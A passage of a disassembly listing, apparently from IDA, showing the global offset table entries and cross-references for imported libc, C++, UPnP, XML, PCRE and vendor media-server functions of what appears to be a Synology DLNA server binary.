_ZN11MediaServer16DMSGetProductUDNEv\n .got.plt:080BA2B0 ; DATA XREF: MediaServer::DMSGetProductUDN(void)r\n .got.plt:080BA2B0 ; MediaServer::DMSGetProductUDN(void)\n .got.plt:080BA2B4 off_80BA2B4 dd offset fprintf ; DATA XREF: _fprintfr\n .got.plt:080BA2B8 off_80BA2B8 dd offset SYNOAacObjectTypeGet\n .got.plt:080BA2B8 ; DATA XREF: _SYNOAacObjectTypeGetr\n .got.plt:080BA2BC off_80BA2BC dd offset pcre_fullinfo ; DATA XREF: _pcre_fullinfor\n .got.plt:080BA2C0 off_80BA2C0 dd offset signal ; DATA XREF: _signalr\n .got.plt:080BA2C4 off_80BA2C4 dd offset UpnpSendAdvertisement\n .got.plt:080BA2C4 ; DATA XREF: _UpnpSendAdvertisementr\n .got.plt:080BA2C8 off_80BA2C8 dd offset _ZN11MediaServer7MediaDB15FetchFieldAsIntEPKc\n .got.plt:080BA2C8 ; DATA XREF: MediaServer::MediaDB::FetchFieldAsInt(char const*)r\n .got.plt:080BA2C8 ; MediaServer::MediaDB::FetchFieldAsInt(char const*)\n .got.plt:080BA2CC off_80BA2CC dd offset ixmlNodeList_length\n .got.plt:080BA2CC ; DATA XREF: _ixmlNodeList_lengthr\n .got.plt:080BA2D0 off_80BA2D0 dd offset _ZN11MediaServer25GetMACAddressFromARPTableERKSs\n .got.plt:080BA2D0 ; DATA XREF: MediaServer::GetMACAddressFromARPTable(std::string const&)r\n .got.plt:080BA2D0 ; MediaServer::GetMACAddressFromARPTable(std::string const&)\n .got.plt:080BA2D4 off_80BA2D4 dd offset unlink ; DATA XREF: _unlinkr\n .got.plt:080BA2D8 off_80BA2D8 dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEE4openEPKcSt13_Ios_Openmode\n .got.plt:080BA2D8 ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::open(char const*,std::_Ios_Openmode)r\n .got.plt:080BA2D8 ; std::basic_filebuf<char,std::char_traits<char>>::open(char const*,std::_Ios_Openmode)\n .got.plt:080BA2DC off_80BA2DC dd offset _ZSt17__throw_bad_allocv\n .got.plt:080BA2DC ; DATA XREF: std::__throw_bad_alloc(void)r\n .got.plt:080BA2DC ; std::__throw_bad_alloc(void)\n .got.plt:080BA2E0 off_80BA2E0 dd offset open64 ; DATA XREF: _open64r\n .got.plt:080BA2E4 off_80BA2E4 dd offset 
_ZN11MediaServer13DMSClientList10UpdateKeysERKSsS2_S2_RKSt3mapISsSsSt4lessISsESaISt4pairIS1_SsEEE\n .got.plt:080BA2E4 ; DATA XREF: MediaServer::DMSClientList::UpdateKeys(std::string const&,std::string const&,std::string const&,std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> const&)r\n .got.plt:080BA2E4 ; MediaServer::DMSClientList::UpdateKeys(std::string const&,std::string const&,std::string const&,std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> const&)\n .got.plt:080BA2E8 off_80BA2E8 dd offset _ZNK7pcrecpp2RE12PartialMatchERKNS_11StringPieceERKNS_3ArgES6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_\n .got.plt:080BA2E8 ; DATA XREF: pcrecpp::RE::PartialMatch(pcrecpp::StringPiece const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&)r\n .got.plt:080BA2E8 ; pcrecpp::RE::PartialMatch(pcrecpp::StringPiece const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&)\n .got.plt:080BA2EC off_80BA2EC dd offset strerror ; DATA XREF: _strerrorr\n .got.plt:080BA2F0 off_80BA2F0 dd offset pthread_cancel ; DATA XREF: _pthread_cancelr\n .got.plt:080BA2F4 off_80BA2F4 dd offset _ZN11MediaServer11DMSLogCloseEv\n .got.plt:080BA2F4 ; DATA XREF: sub_8084BDC:MediaServer::DMSLogClose(void)r\n .got.plt:080BA2F4 ; MediaServer::DMSLogClose(void)\n .got.plt:080BA2F8 off_80BA2F8 dd offset 
_ZN14SynoAudioUtils17SmartPLSListSongsEiiiRiRSt4listI21__tag_SYNO_MEDIA_INFOSaIS2_EEb\n .got.plt:080BA2F8 ; DATA XREF: SynoAudioUtils::SmartPLSListSongs(int,int,int,int &,std::list<__tag_SYNO_MEDIA_INFO,std::allocator<__tag_SYNO_MEDIA_INFO>> &,bool)r\n .got.plt:080BA2F8 ; SynoAudioUtils::SmartPLSListSongs(int,int,int,int &,std::list<__tag_SYNO_MEDIA_INFO,std::allocator<__tag_SYNO_MEDIA_INFO>> &,bool)\n .got.plt:080BA2FC off_80BA2FC dd offset termPQExpBuffer ; DATA XREF: _termPQExpBufferr\n .got.plt:080BA300 off_80BA300 dd offset dirname ; DATA XREF: _dirnamer\n .got.plt:080BA304 off_80BA304 dd offset _ZNKSs7compareEPKc\n .got.plt:080BA304 ; DATA XREF: std::string::compare(char const*)r\n .got.plt:080BA304 ; std::string::compare(char const*)\n .got.plt:080BA308 off_80BA308 dd offset __cxa_atexit ; DATA XREF: ___cxa_atexitr\n .got.plt:080BA30C off_80BA30C dd offset __errno_location ; DATA XREF: ___errno_locationr\n .got.plt:080BA310 off_80BA310 dd offset _ZN11MediaServer13DMSClientListC1Ev\n .got.plt:080BA310 ; DATA XREF: MediaServer::DMSClientList::DMSClientList(void)r\n .got.plt:080BA310 ; MediaServer::DMSClientList::DMSClientList(void)\n .got.plt:080BA314 off_80BA314 dd offset MediaInfoDBClose ; DATA XREF: _MediaInfoDBCloser\n .got.plt:080BA318 off_80BA318 dd offset _ZN14SynoAudioUtils16SmartPLSGetCountEv\n .got.plt:080BA318 ; DATA XREF: SynoAudioUtils::SmartPLSGetCount(void)r\n .got.plt:080BA318 ; SynoAudioUtils::SmartPLSGetCount(void)\n .got.plt:080BA31C off_80BA31C dd offset _ZN11MediaServer17DMSFormatUPNPDateEPKc\n .got.plt:080BA31C ; DATA XREF: MediaServer::DMSFormatUPNPDate(char const*)r\n .got.plt:080BA31C ; MediaServer::DMSFormatUPNPDate(char const*)\n .got.plt:080BA320 off_80BA320 dd offset _ZN14SynoAudioUtils20SmartPLSGetSongCountEib\n .got.plt:080BA320 ; DATA XREF: SynoAudioUtils::SmartPLSGetSongCount(int,bool)r\n .got.plt:080BA320 ; SynoAudioUtils::SmartPLSGetSongCount(int,bool)\n .got.plt:080BA324 off_80BA324 dd offset 
_ZSt28_Rb_tree_rebalance_for_erasePSt18_Rb_tree_node_baseRS_\n .got.plt:080BA324 ; DATA XREF: std::_Rb_tree_rebalance_for_erase(std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)r\n .got.plt:080BA324 ; std::_Rb_tree_rebalance_for_erase(std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)\n .got.plt:080BA328 off_80BA328 dd offset access ; DATA XREF: _accessr\n .got.plt:080BA32C off_80BA32C dd offset ixmlDocument_free\n .got.plt:080BA32C ; DATA XREF: _ixmlDocument_freer\n .got.plt:080BA330 off_80BA330 dd offset ixmlPrintDocument\n .got.plt:080BA330 ; DATA XREF: _ixmlPrintDocumentr\n .got.plt:080BA334 off_80BA334 dd offset ixmlNode_getAttributes\n .got.plt:080BA334 ; DATA XREF: _ixmlNode_getAttributesr\n .got.plt:080BA338 off_80BA338 dd offset inet_ntoa ; DATA XREF: _inet_ntoar\n .got.plt:080BA33C off_80BA33C dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEEC1Ev\n .got.plt:080BA33C ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::basic_filebuf(void)r\n .got.plt:080BA33C ; std::basic_filebuf<char,std::char_traits<char>>::basic_filebuf(void)\n .got.plt:080BA340 off_80BA340 dd offset ixmlNode_getChildNodes\n .got.plt:080BA340 ; DATA XREF: _ixmlNode_getChildNodesr\n .got.plt:080BA344 off_80BA344 dd offset _ZN11MediaServer15XMLEnumElementsEP10_IXML_NodeRKSs\n .got.plt:080BA344 ; DATA XREF: MediaServer::XMLEnumElements(_IXML_Node *,std::string const&)r\n .got.plt:080BA344 ; MediaServer::XMLEnumElements(_IXML_Node *,std::string const&)\n .got.plt:080BA348 off_80BA348 dd offset _ZNSs7reserveEj\n .got.plt:080BA348 ; DATA XREF: std::string::reserve(uint)r\n .got.plt:080BA348 ; std::string::reserve(uint)\n .got.plt:080BA34C off_80BA34C dd offset pcre_get_substring_list\n .got.plt:080BA34C ; DATA XREF: _pcre_get_substring_listr\n .got.plt:080BA350 off_80BA350 dd offset _ZNKSs4findEPKcjj\n .got.plt:080BA350 ; DATA XREF: std::string::find(char const*,uint,uint)r\n .got.plt:080BA350 ; std::string::find(char const*,uint,uint)\n .got.plt:080BA354 off_80BA354 dd offset 
malloc ; DATA XREF: _mallocr\n .got.plt:080BA358 off_80BA358 dd offset ixmlCloneDOMString\n .got.plt:080BA358 ; DATA XREF: _ixmlCloneDOMStringr\n .got.plt:080BA35C off_80BA35C dd offset pthread_mutex_init\n .got.plt:080BA35C ; DATA XREF: _pthread_mutex_initr\n .got.plt:080BA360 off_80BA360 dd offset fscanf ; DATA XREF: _fscanfr\n .got.plt:080BA364 off_80BA364 dd offset _ZNSsC1ERKSsjj\n .got.plt:080BA364 ; DATA XREF: std::string::string(std::string const&,uint,uint)r\n .got.plt:080BA364 ; std::string::string(std::string const&,uint,uint)\n .got.plt:080BA368 off_80BA368 dd offset SLIBCFileGetKeyValue\n .got.plt:080BA368 ; DATA XREF: _SLIBCFileGetKeyValuer\n .got.plt:080BA36C off_80BA36C dd offset fread ; DATA XREF: _freadr\n .got.plt:080BA370 off_80BA370 dd offset memmove ; DATA XREF: _memmover\n .got.plt:080BA374 off_80BA374 dd offset _ZN11MediaServer23XMLGetFirstDocumentItemEP14_IXML_DocumentPKcPb\n .got.plt:080BA374 ; DATA XREF: MediaServer::XMLGetFirstDocumentItem(_IXML_Document *,char const*,bool *)r\n .got.plt:080BA374 ; MediaServer::XMLGetFirstDocumentItem(_IXML_Document *,char const*,bool *)\n .got.plt:080BA378 off_80BA378 dd offset _ZN11MediaServer16DMSClientChecker13GetOffendCharEv\n .got.plt:080BA378 ; DATA XREF: MediaServer::DMSClientChecker::GetOffendChar(void)r\n .got.plt:080BA378 ; MediaServer::DMSClientChecker::GetOffendChar(void)\n .got.plt:080BA37C off_80BA37C dd offset _ZN11MediaServer13StringExplodeERKSsS1_\n .got.plt:080BA37C ; DATA XREF: MediaServer::StringExplode(std::string const&,std::string const&)r\n .got.plt:080BA37C ; MediaServer::StringExplode(std::string const&,std::string const&)\n .got.plt:080BA380 off_80BA380 dd offset _ZNSt12__basic_fileIcED1Ev\n .got.plt:080BA380 ; DATA XREF: std::__basic_file<char>::~__basic_file()r\n .got.plt:080BA380 ; std::__basic_file<char>::~__basic_file()\n .got.plt:080BA384 off_80BA384 dd offset syslog ; DATA XREF: _syslogr\n .got.plt:080BA388 off_80BA388 dd offset daemon ; DATA XREF: _daemonr\n 
.got.plt:080BA38C off_80BA38C dd offset ixmlNamedNodeMap_free\n .got.plt:080BA38C ; DATA XREF: _ixmlNamedNodeMap_freer\n .got.plt:080BA390 off_80BA390 dd offset _ZNSs6appendERKSs\n .got.plt:080BA390 ; DATA XREF: std::string::append(std::string const&)r\n .got.plt:080BA390 ; std::string::append(std::string const&)\n .got.plt:080BA394 off_80BA394 dd offset _ZN11MediaServer12GetCoverListERSt6vectorISsSaISsEE\n .got.plt:080BA394 ; DATA XREF: MediaServer::GetCoverList(std::vector<std::string,std::allocator<std::string>> &)r\n .got.plt:080BA394 ; MediaServer::GetCoverList(std::vector<std::string,std::allocator<std::string>> &)\n .got.plt:080BA398 off_80BA398 dd offset UpnpAddToActionResponse\n .got.plt:080BA398 ; DATA XREF: _UpnpAddToActionResponser\n .got.plt:080BA39C off_80BA39C dd offset _ZN11MediaServer14DMSLOGSetLevelENS_12DMSLOG_LEVELE\n .got.plt:080BA39C ; DATA XREF: MediaServer::DMSLOGSetLevel(MediaServer::DMSLOG_LEVEL)r\n .got.plt:080BA39C ; MediaServer::DMSLOGSetLevel(MediaServer::DMSLOG_LEVEL)\n .got.plt:080BA3A0 off_80BA3A0 dd offset _ZN11MediaServer7MediaDB7NextRowEv\n .got.plt:080BA3A0 ; DATA XREF: MediaServer::MediaDB::NextRow(void)r\n .got.plt:080BA3A0 ; MediaServer::MediaDB::NextRow(void)\n .got.plt:080BA3A4 off_80BA3A4 dd offset _ZNSsD1Ev ; DATA XREF: std::string::~string()r\n .got.plt:080BA3A4 ; std::string::~string()\n .got.plt:080BA3A8 off_80BA3A8 dd offset _ZN11MediaServer16DMSClientChecker19getVideoProfileNameEPK21__tag_SYNO_MEDIA_INFO\n .got.plt:080BA3A8 ; DATA XREF: MediaServer::DMSClientChecker::getVideoProfileName(__tag_SYNO_MEDIA_INFO const*)r\n .got.plt:080BA3A8 ; MediaServer::DMSClientChecker::getVideoProfileName(__tag_SYNO_MEDIA_INFO const*)\n .got.plt:080BA3AC off_80BA3AC dd offset __cxa_allocate_exception\n .got.plt:080BA3AC ; DATA XREF: ___cxa_allocate_exceptionr\n .got.plt:080BA3B0 off_80BA3B0 dd offset UpnpNotify ; DATA XREF: _UpnpNotifyr\n .got.plt:080BA3B4 off_80BA3B4 dd offset _ZN11MediaServer24FileGetPathBaseNameNoExtERKSs\n 
.got.plt:080BA3B4 ; DATA XREF: MediaServer::FileGetPathBaseNameNoExt(std::string const&)r\n .got.plt:080BA3B4 ; MediaServer::FileGetPathBaseNameNoExt(std::string const&)\n .got.plt:080BA3B8 off_80BA3B8 dd offset _ZN11MediaServer21DMSFormatUPNPDurationEi\n .got.plt:080BA3B8 ; DATA XREF: MediaServer::DMSFormatUPNPDuration(int)r\n .got.plt:080BA3B8 ; MediaServer::DMSFormatUPNPDuration(int)\n .got.plt:080BA3BC off_80BA3BC dd offset _ZN4Json5ValueC1Ei\n .got.plt:080BA3BC ; DATA XREF: Json::Value::Value(int)r\n .got.plt:080BA3BC ; Json::Value::Value(int)\n .got.plt:080BA3C0 off_80BA3C0 dd offset ixmlNode_getNodeValue\n .got.plt:080BA3C0 ; DATA XREF: _ixmlNode_getNodeValuer\n .got.plt:080BA3C4 off_80BA3C4 dd offset _ZN11MediaServer18DMSGetProductModelEv\n .got.plt:080BA3C4 ; DATA XREF: MediaServer::DMSGetProductModel(void)r\n .got.plt:080BA3C4 ; MediaServer::DMSGetProductModel(void)\n .got.plt:080BA3C8 off_80BA3C8 dd offset time ; DATA XREF: _timer\n .got.plt:080BA3CC off_80BA3CC dd offset BlSYNOIndexIsRawImage\n .got.plt:080BA3CC ; DATA XREF: _BlSYNOIndexIsRawImager\n .got.plt:080BA3D0 off_80BA3D0 dd offset _ZN11MediaServer15DMSStringBundle13ImportStringsEv\n .got.plt:080BA3D0 ; DATA XREF: MediaServer::DMSStringBundle::ImportStrings(void)r\n .got.plt:080BA3D0 ; MediaServer::DMSStringBundle::ImportStrings(void)\n .got.plt:080BA3D4 off_80BA3D4 dd offset ixmlNodeList_item\n .got.plt:080BA3D4 ; DATA XREF: _ixmlNodeList_itemr\n .got.plt:080BA3D8 off_80BA3D8 dd offset pthread_mutex_lock\n .got.plt:080BA3D8 ; DATA XREF: _pthread_mutex_lockr\n .got.plt:080BA3DC off_80BA3DC dd offset _ZN11MediaServer18FileGetPathDirNameERKSs\n .got.plt:080BA3DC ; DATA XREF: MediaServer::FileGetPathDirName(std::string const&)r\n .got.plt:080BA3DC ; MediaServer::FileGetPathDirName(std::string const&)\n .got.plt:080BA3E0 off_80BA3E0 dd offset UpnpFinish ; DATA XREF: _UpnpFinishr\n .got.plt:080BA3E4 off_80BA3E4 dd offset _ZNSs4_Rep10_M_destroyERKSaIcE\n .got.plt:080BA3E4 ; DATA XREF: 
std::string::_Rep::_M_destroy(std::allocator<char> const&)r\n .got.plt:080BA3E4 ; std::string::_Rep::_M_destroy(std::allocator<char> const&)\n .got.plt:080BA3E8 off_80BA3E8 dd offset _ZN14SynoAudioUtils9RadioInitEv\n .got.plt:080BA3E8 ; DATA XREF: SynoAudioUtils::RadioInit(void)r\n .got.plt:080BA3E8 ; SynoAudioUtils::RadioInit(void)\n .got.plt:080BA3EC off_80BA3EC dd offset ixmlNode_getNodeName\n .got.plt:080BA3EC ; DATA XREF: _ixmlNode_getNodeNamer\n .got.plt:080BA3F0 off_80BA3F0 dd offset _ZN11MediaServer22DMSGetNetworkInterfaceERSt3mapISsSsSt4lessISsESaISt4pairIKSsSsEEE\n .got.plt:080BA3F0 ; DATA XREF: MediaServer::DMSGetNetworkInterface(std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> &)r\n .got.plt:080BA3F0 ; MediaServer::DMSGetNetworkInterface(std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> &)\n .got.plt:080BA3F4 off_80BA3F4 dd offset strstr ; DATA XREF: _strstrr\n .got.plt:080BA3F8 off_80BA3F8 dd offset sleep ; DATA XREF: _sleepr\n .got.plt:080BA3FC off_80BA3FC dd offset _ZN11MediaServer9XMLEscapeERKSsPKc\n .got.plt:080BA3FC ; DATA XREF: MediaServer::XMLEscape(std::string const&,char const*)r\n .got.plt:080BA3FC ; MediaServer::XMLEscape(std::string const&,char const*)\n .got.plt:080BA400 off_80BA400 dd offset MediaInfoDBOpen ; DATA XREF: _MediaInfoDBOpenr\n .got.plt:080BA404 off_80BA404 dd offset __strtol_internal\n .got.plt:080BA404 ; DATA XREF: ___strtol_internalr\n .got.plt:080BA408 off_80BA408 dd offset pthread_setspecific\n .got.plt:080BA408 ; DATA XREF: _pthread_setspecificr\n .got.plt:080BA40C off_80BA40C dd offset pthread_key_create\n .got.plt:080BA40C ; DATA XREF: _pthread_key_creater\n .got.plt:080BA410 off_80BA410 dd offset _ZNSsC1ERKSs ; DATA XREF: std::string::string(std::string const&)r\n .got.plt:080BA410 ; std::string::string(std::string const&)\n .got.plt:080BA414 off_80BA414 dd offset UpnpAcceptSubscription\n 
.got.plt:080BA414 ; DATA XREF: _UpnpAcceptSubscriptionr\n .got.plt:080BA418 off_80BA418 dd offset __cxa_begin_catch\n .got.plt:080BA418 ; DATA XREF: ___cxa_begin_catchr\n .got.plt:080BA41C off_80BA41C dd offset _ZN11MediaServer13DMSClientList11FindMacByIPERKSs\n .got.plt:080BA41C ; DATA XREF: MediaServer::DMSClientList::FindMacByIP(std::string const&)r\n .got.plt:080BA41C ; MediaServer::DMSClientList::FindMacByIP(std::string const&)\n .got.plt:080BA420 off_80BA420 dd offset _Znaj ; DATA XREF: operator new[](uint)r\n .got.plt:080BA420 ; operator new[](uint)\n .got.plt:080BA424 off_80BA424 dd offset _ZN14SynoAudioUtils19RadioGetStationDataEjjRNS_12RadioStationE\n .got.plt:080BA424 ; DATA XREF: SynoAudioUtils::RadioGetStationData(uint,uint,SynoAudioUtils::RadioStation &)r\n .got.plt:080BA424 ; SynoAudioUtils::RadioGetStationData(uint,uint,SynoAudioUtils::RadioStation &)\n .got.plt:080BA428 off_80BA428 dd offset __xstat64 ; DATA XREF: ___xstat64r\n .got.plt:080BA42C off_80BA42C dd offset _ZSt18_Rb_tree_decrementPSt18_Rb_tree_node_base\n .got.plt:080BA42C ; DATA XREF: std::_Rb_tree_decrement(std::_Rb_tree_node_base *)r\n .got.plt:080BA42C ; std::_Rb_tree_decrement(std::_Rb_tree_node_base *)\n .got.plt:080BA430 off_80BA430 dd offset _ZNSsC1EPKcRKSaIcE\n .got.plt:080BA430 ; DATA XREF: std::string::string(char const*,std::allocator<char> const&)r\n .got.plt:080BA430 ; std::string::string(char const*,std::allocator<char> const&)\n .got.plt:080BA434 off_80BA434 dd offset initPQExpBuffer ; DATA XREF: _initPQExpBufferr\n .got.plt:080BA438 off_80BA438 dd offset pcre_compile ; DATA XREF: _pcre_compiler\n .got.plt:080BA43C off_80BA43C dd offset _ZN11MediaServer14DMSLOGGetLevelEv\n .got.plt:080BA43C ; DATA XREF: MediaServer::DMSLOGGetLevel(void)r\n .got.plt:080BA43C ; MediaServer::DMSLOGGetLevel(void)\n .got.plt:080BA440 off_80BA440 dd offset SYNODBConnect ; DATA XREF: _SYNODBConnectr\n .got.plt:080BA444 off_80BA444 dd offset _ZN11MediaServer16DMSClientCheckerC1ERKSsS2_b\n 
.got.plt:080BA444 ; DATA XREF: MediaServer::DMSClientChecker::DMSClientChecker(std::string const&,std::string const&,bool)r\n .got.plt:080BA444 ; MediaServer::DMSClientChecker::DMSClientChecker(std::string const&,std::string const&,bool)\n .got.plt:080BA448 off_80BA448 dd offset _ZN14SynoAudioUtils12SmartPLSEnumEiiRiPKc\n .got.plt:080BA448 ; DATA XREF: SynoAudioUtils::SmartPLSEnum(int,int,int &,char const*)r\n .got.plt:080BA448 ; SynoAudioUtils::SmartPLSEnum(int,int,int &,char const*)\n .got.plt:080BA44C off_80BA44C dd offset _ZN11MediaServer13StringToLowerERKSs\n .got.plt:080BA44C ; DATA XREF: MediaServer::StringToLower(std::string const&)r\n .got.plt:080BA44C ; MediaServer::StringToLower(std::string const&)\n .got.plt:080BA450 off_80BA450 dd offset __libc_start_main\n .got.plt:080BA450 ; DATA XREF: ___libc_start_mainr\n .got.plt:080BA454 off_80BA454 dd offset _ZN11MediaServer7MediaDB11SelectTotalEv\n .got.plt:080BA454 ; DATA XREF: MediaServer::MediaDB::SelectTotal(void)r\n .got.plt:080BA454 ; MediaServer::MediaDB::SelectTotal(void)\n .got.plt:080BA458 off_80BA458 dd offset _ZN11MediaServer21DMSGetMediaFolderPathE21_tag_MEDIA_TABLE_TYPE\n .got.plt:080BA458 ; DATA XREF: MediaServer::DMSGetMediaFolderPath(_tag_MEDIA_TABLE_TYPE)r\n .got.plt:080BA458 ; MediaServer::DMSGetMediaFolderPath(_tag_MEDIA_TABLE_TYPE)\n .got.plt:080BA45C off_80BA45C dd offset _ZN11MediaServer13DMSClientList11WriteToFileEv\n .got.plt:080BA45C ; DATA XREF: MediaServer::DMSClientList::WriteToFile(void)r\n .got.plt:080BA45C ; MediaServer::DMSClientList::WriteToFile(void)\n .got.plt:080BA460 off_80BA460 dd offset _ZSt18_Rb_tree_incrementPSt18_Rb_tree_node_base\n .got.plt:080BA460 ; DATA XREF: std::_Rb_tree_increment(std::_Rb_tree_node_base *)r\n .got.plt:080BA460 ; std::_Rb_tree_increment(std::_Rb_tree_node_base *)\n .got.plt:080BA464 off_80BA464 dd offset _ZNSs14_M_replace_auxEjjjc\n .got.plt:080BA464 ; DATA XREF: std::string::_M_replace_aux(uint,uint,uint,char)r\n .got.plt:080BA464 ; 
std::string::_M_replace_aux(uint,uint,uint,char)\n .got.plt:080BA468 off_80BA468 dd offset _ZN11MediaServer20XMLGetAttributeValueEP10_IXML_NodeRKSs\n .got.plt:080BA468 ; DATA XREF: MediaServer::XMLGetAttributeValue(_IXML_Node *,std::string const&)r\n .got.plt:080BA468 ; MediaServer::XMLGetAttributeValue(_IXML_Node *,std::string const&)\n .got.plt:080BA46C off_80BA46C dd offset _ZNSs6appendEPKcj\n .got.plt:080BA46C ; DATA XREF: std::string::append(char const*,uint)r\n .got.plt:080BA46C ; std::string::append(char const*,uint)\n .got.plt:080BA470 off_80BA470 dd offset _Znwj ; DATA XREF: operator new(uint)r\n .got.plt:080BA470 ; operator new(uint)\n .got.plt:080BA474 off_80BA474 dd offset UpnpSetWebServerRootDir\n .got.plt:080BA474 ; DATA XREF: _UpnpSetWebServerRootDirr\n .got.plt:080BA478 off_80BA478 dd offset _ZN11MediaServer7MediaDBD1Ev\n .got.plt:080BA478 ; DATA XREF: MediaServer::MediaDB::~MediaDB()r\n .got.plt:080BA478 ; MediaServer::MediaDB::~MediaDB()\n .got.plt:080BA47C off_80BA47C dd offset SLIBCStrTokIndex ; DATA XREF: _SLIBCStrTokIndexr\n .got.plt:080BA480 off_80BA480 dd offset _ZN11MediaServer19XMLFindChildElementERKSsP10_IXML_Node\n .got.plt:080BA480 ; DATA XREF: MediaServer::XMLFindChildElement(std::string const&,_IXML_Node *)r\n .got.plt:080BA480 ; MediaServer::XMLFindChildElement(std::string const&,_IXML_Node *)\n .got.plt:080BA484 off_80BA484 dd offset _ZNSt8ios_baseD2Ev\n .got.plt:080BA484 ; DATA XREF: std::ios_base::~ios_base()r\n .got.plt:080BA484 ; std::ios_base::~ios_base()\n .got.plt:080BA488 off_80BA488 dd offset _ZSt29_Rb_tree_insert_and_rebalancebPSt18_Rb_tree_node_baseS0_RS_\n .got.plt:080BA488 ; DATA XREF: std::_Rb_tree_insert_and_rebalance(bool,std::_Rb_tree_node_base *,std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)r\n .got.plt:080BA488 ; std::_Rb_tree_insert_and_rebalance(bool,std::_Rb_tree_node_base *,std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)\n .got.plt:080BA48C off_80BA48C dd offset _ZN4Json5ValueaSERKS0_\n 
.got.plt:080BA48C ; DATA XREF: Json::Value::operator=(Json::Value const&)r\n .got.plt:080BA48C ; Json::Value::operator=(Json::Value const&)\n .got.plt:080BA490 off_80BA490 dd offset _ZN11MediaServer10DMSLOGInitEPKc\n .got.plt:080BA490 ; DATA XREF: MediaServer::DMSLOGInit(char const*)r\n .got.plt:080BA490 ; MediaServer::DMSLOGInit(char const*)\n .got.plt:080BA494 off_80BA494 dd offset MediaInfoDBGet ; DATA XREF: _MediaInfoDBGetr\n .got.plt:080BA498 off_80BA498 dd offset fclose ; DATA XREF: _fcloser\n .got.plt:080BA49C off_80BA49C dd offset _ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate\n .got.plt:080BA49C ; DATA XREF: std::basic_ios<char,std::char_traits<char>>::clear(std::_Ios_Iostate)r\n .got.plt:080BA49C ; std::basic_ios<char,std::char_traits<char>>::clear(std::_Ios_Iostate)\n .got.plt:080BA4A0 off_80BA4A0 dd offset strrchr ; DATA XREF: _strrchrr\n .got.plt:080BA4A4 off_80BA4A4 dd offset SYNONetGetCard1 ; DATA XREF: _SYNONetGetCard1r\n .got.plt:080BA4A8 off_80BA4A8 dd offset _ZN11MediaServer21GetIndexLoacationPathERK21_tag_MEDIA_TABLE_TYPE\n .got.plt:080BA4A8 ; DATA XREF: MediaServer::GetIndexLoacationPath(_tag_MEDIA_TABLE_TYPE const&)r\n .got.plt:080BA4A8 ; MediaServer::GetIndexLoacationPath(_tag_MEDIA_TABLE_TYPE const&)\n .got.plt:080BA4AC off_80BA4AC dd offset _ZN11MediaServer9DMSPrintfENS_12DMSLOG_LEVELEPKcz\n .got.plt:080BA4AC ; DATA XREF: MediaServer::DMSPrintf(MediaServer::DMSLOG_LEVEL,char const*,...)r\n .got.plt:080BA4AC ; MediaServer::DMSPrintf(MediaServer::DMSLOG_LEVEL,char const*,...)\n .got.plt:080BA4B0 off_80BA4B0 dd offset fopen64 ; DATA XREF: _fopen64r\n .got.plt:080BA4B4 off_80BA4B4 dd offset UpnpGetServerPort\n .got.plt:080BA4B4 ; DATA XREF: _UpnpGetServerPortr\n .got.plt:080BA4B8 off_80BA4B8 dd offset _ZN14SynoAudioUtils14RadioGetGenresEiiRSt6vectorINS_10RadioGenreESaIS1_EERi\n .got.plt:080BA4B8 ; DATA XREF: SynoAudioUtils::RadioGetGenres(int,int,std::vector<SynoAudioUtils::RadioGenre,std::allocator<SynoAudioUtils::RadioGenre>> 
&,int &)r\n .got.plt:080BA4B8 ; SynoAudioUtils::RadioGetGenres(int,int,std::vector<SynoAudioUtils::RadioGenre,std::allocator<SynoAudioUtils::RadioGenre>> &,int &)\n .got.plt:080BA4BC off_80BA4BC dd offset _ZN11MediaServer16XMLEnumTagValuesEP10_IXML_NodeRKSs\n .got.plt:080BA4BC ; DATA XREF: MediaServer::XMLEnumTagValues(_IXML_Node *,std::string const&)r\n .got.plt:080BA4BC ; MediaServer::XMLEnumTagValues(_IXML_Node *,std::string const&)\n .got.plt:080BA4C0 off_80BA4C0 dd offset snprintf ; DATA XREF: _snprintfr\n .got.plt:080BA4C4 off_80BA4C4 dd offset gethostname ; DATA XREF: _gethostnamer\n .got.plt:080BA4C8 off_80BA4C8 dd offset _ZN11MediaServer16DMSClientChecker15InitProfileListERKSs\n .got.plt:080BA4C8 ; DATA XREF: MediaServer::DMSClientChecker::InitProfileList(std::string const&)r\n .got.plt:080BA4C8 ; MediaServer::DMSClientChecker::InitProfileList(std::string const&)\n .got.plt:080BA4CC off_80BA4CC dd offset __cxa_pure_virtual\n .got.plt:080BA4CC ; DATA XREF: ___cxa_pure_virtualr\n .got.plt:080BA4D0 off_80BA4D0 dd offset strcasecmp ; DATA XREF: _strcasecmpr\n .got.plt:080BA4D4 off_80BA4D4 dd offset mkstemp64 ; DATA XREF: _mkstemp64r\n .got.plt:080BA4D8 off_80BA4D8 dd offset inet_ntop ; DATA XREF: _inet_ntopr\n .got.plt:080BA4DC off_80BA4DC dd offset _ZSt20__throw_length_errorPKc\n .got.plt:080BA4DC ; DATA XREF: std::__throw_length_error(char const*)r\n .got.plt:080BA4DC ; 